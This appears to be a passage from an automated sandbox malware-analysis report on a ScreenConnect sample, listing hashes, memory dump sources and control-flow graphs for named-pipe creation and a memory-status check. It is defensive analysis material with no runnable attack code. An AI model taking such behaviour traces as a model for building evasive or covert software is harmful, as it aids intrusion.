                                                                                              • Opcode Fuzzy Hash: 211d8ea40b675e3bf43a6bf633d9624fe979c724c1a34933567c3754f6c4a9af
                                                                                              • Instruction Fuzzy Hash: 88C02B02F0FD4C1BFBD0A598443676A0182DFB5382F81007BB40CC11E3DC589C0A4300
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 065b225b4bd21a7db7e91e9574bd1d4eabdd0240b98abe7cfcf9def78f5a9bbd
                                                                                              • Instruction ID: 6e6f1d22716ee900b984cd8c3c68202adb64d52f0feee5c7dedc15cdc9ed435d
                                                                                              • Opcode Fuzzy Hash: 065b225b4bd21a7db7e91e9574bd1d4eabdd0240b98abe7cfcf9def78f5a9bbd
                                                                                              • Instruction Fuzzy Hash: FFC09B10F1AD5E46F166EBA9447117D1162EF8C600BD24435D00D85197CD3C67015645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 81f7068886334a1449be0078e8a23011a27193cba12888c68009e0ed2993e715
                                                                                              • Instruction ID: 5c074a8a60c42c686091ae3d5d15be941cee6cf9c088d990359e06703da69233
                                                                                              • Opcode Fuzzy Hash: 81f7068886334a1449be0078e8a23011a27193cba12888c68009e0ed2993e715
                                                                                              • Instruction Fuzzy Hash: BFA00200F4FD6E45E0B766D9002117D41518F59640AA24135D00D851A7CD2D6F425296

                                                                                              Execution Graph

                                                                                              Execution Coverage:11.6%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:11
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph 17158 7ffd9b283662 17159 7ffd9b2a5850 ConnectNamedPipe 17158->17159 17161 7ffd9b2a5902 17159->17161 17162 7ffd9b283642 17163 7ffd9b2a56b0 CreateNamedPipeW 17162->17163 17165 7ffd9b2a57e3 17163->17165 17153 7ffd9b5992c4 17157 7ffd9b5992cd 17153->17157 17154 7ffd9b5993c8 17155 7ffd9b59946c GlobalMemoryStatusEx 17156 7ffd9b599495 17155->17156 17157->17154 17157->17155

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 41 7ffd9b5992c4-7ffd9b5992cb 42 7ffd9b5992d6-7ffd9b59933a 41->42 43 7ffd9b5992cd-7ffd9b5992d5 41->43 47 7ffd9b59933c-7ffd9b599365 42->47 48 7ffd9b599384-7ffd9b59938a 42->48 43->42 49 7ffd9b599367-7ffd9b59936a 47->49 50 7ffd9b5993be 47->50 55 7ffd9b59938e-7ffd9b599397 48->55 52 7ffd9b59936c-7ffd9b59936e 49->52 53 7ffd9b5993eb-7ffd9b5993ef 49->53 54 7ffd9b5993bf 50->54 56 7ffd9b5993ea 52->56 57 7ffd9b599370 52->57 79 7ffd9b5993f0 53->79 58 7ffd9b59943b-7ffd9b59943d 54->58 59 7ffd9b5993c0 54->59 60 7ffd9b599408-7ffd9b599409 55->60 61 7ffd9b599399-7ffd9b59939d 55->61 56->53 66 7ffd9b599372-7ffd9b599374 57->66 67 7ffd9b5993b3 57->67 69 7ffd9b599441-7ffd9b599467 58->69 59->69 70 7ffd9b5993c1 59->70 62 7ffd9b59946c-7ffd9b599493 GlobalMemoryStatusEx 60->62 63 7ffd9b59940b-7ffd9b59941c 60->63 64 7ffd9b59941e-7ffd9b59941f 61->64 65 7ffd9b59939f-7ffd9b5993a1 61->65 83 7ffd9b599495 62->83 84 7ffd9b59949b-7ffd9b5994c2 62->84 72 7ffd9b59941d 63->72 74 7ffd9b599469-7ffd9b59946a 64->74 75 7ffd9b599420-7ffd9b599421 64->75 65->72 73 7ffd9b5993a3-7ffd9b5993a7 65->73 78 7ffd9b599376 66->78 66->79 76 7ffd9b5993b5 67->76 77 7ffd9b59942f-7ffd9b599433 67->77 69->74 81 7ffd9b5993c2-7ffd9b5993c6 70->81 82 7ffd9b599403-7ffd9b599407 70->82 72->64 87 7ffd9b5993a9 73->87 88 7ffd9b599423-7ffd9b599428 73->88 74->62 75->88 89 7ffd9b5993b6-7ffd9b5993b7 76->89 90 7ffd9b5993f7-7ffd9b5993f9 76->90 91 7ffd9b599435-7ffd9b59943a 77->91 85 7ffd9b599378-7ffd9b59937a 78->85 86 7ffd9b5993b9 78->86 81->55 92 7ffd9b5993c8-7ffd9b5993e9 81->92 82->60 83->84 95 7ffd9b5993f6 85->95 96 7ffd9b59937c 85->96 86->91 97 7ffd9b5993bb-7ffd9b5993bd 86->97 87->53 93 7ffd9b5993ab-7ffd9b5993ad 87->93 94 7ffd9b599429-7ffd9b59942e 88->94 89->86 98 7ffd9b5993fb-7ffd9b5993fe 90->98 99 7ffd9b5993ff 90->99 91->58 92->56 93->94 104 7ffd9b5993af-7ffd9b5993b1 93->104 94->77 95->90 96->54 101 7ffd9b59937e-7ffd9b599381 96->101 97->50 98->99 102 7ffd9b599400-7ffd9b599401 99->102 103 7ffd9b599402 99->103 101->102 105 7ffd9b599383 101->105 102->103 103->82 104->67 105->48
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1909201474.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: c81fda8995368522d76fb97f9a6ecaf0c4523de3053f5833cf9bef438703dd88
                                                                                              • Instruction ID: ce916a54a3ad87df65e735c5e6dd62d351d20b8cc6521454bbdab4fd69c8d270
                                                                                              • Opcode Fuzzy Hash: c81fda8995368522d76fb97f9a6ecaf0c4523de3053f5833cf9bef438703dd88
                                                                                              • Instruction Fuzzy Hash: 1E81053190E68D4FE7B7DBA888296A87BF0FF52310F4541BAC04DC76E7DA58690A8341

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 246 7ffd9b283642-7ffd9b2a571a 249 7ffd9b2a571c-7ffd9b2a5721 246->249 250 7ffd9b2a5724-7ffd9b2a57e1 CreateNamedPipeW 246->250 249->250 252 7ffd9b2a57e9-7ffd9b2a581c 250->252 253 7ffd9b2a57e3 250->253 253->252
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1903516263.00007FFD9B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd9b280000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2489174969-0
                                                                                              • Opcode ID: 48a597d5e098bf3d889fed6c83119fc48d3db705b6e1bb1b841f89c7945a5fb5
                                                                                              • Instruction ID: 4d30dc51863f1a5a7187e793f3e794ec561809e8ad51e5034ebc26549cdd8ea4
                                                                                              • Opcode Fuzzy Hash: 48a597d5e098bf3d889fed6c83119fc48d3db705b6e1bb1b841f89c7945a5fb5
                                                                                              • Instruction Fuzzy Hash: 43519D7191CA1C9FDB68EF589805BE9BBE0FB58720F1042AEE44DE3251CB34A941CBC1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 255 7ffd9b283662-7ffd9b2a5900 ConnectNamedPipe 259 7ffd9b2a5908-7ffd9b2a594f call 7ffd9b2a5951 255->259 260 7ffd9b2a5902 255->260 260->259
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1903516263.00007FFD9B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd9b280000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: e0f279cac6c73e81f2e244a715beda291f5c0d8a58e931fb7af58a0874a1ffbf
                                                                                              • Instruction ID: f173104bd2040fe497f7a935126cdb2c864e3784d37d5ee4e25ad26f2c0c9e1d
                                                                                              • Opcode Fuzzy Hash: e0f279cac6c73e81f2e244a715beda291f5c0d8a58e931fb7af58a0874a1ffbf
                                                                                              • Instruction Fuzzy Hash: C9315A30E08A1D8FDB58EF98C849BEAB7F1FB58311F00826AD44DD7255CB70A985CB81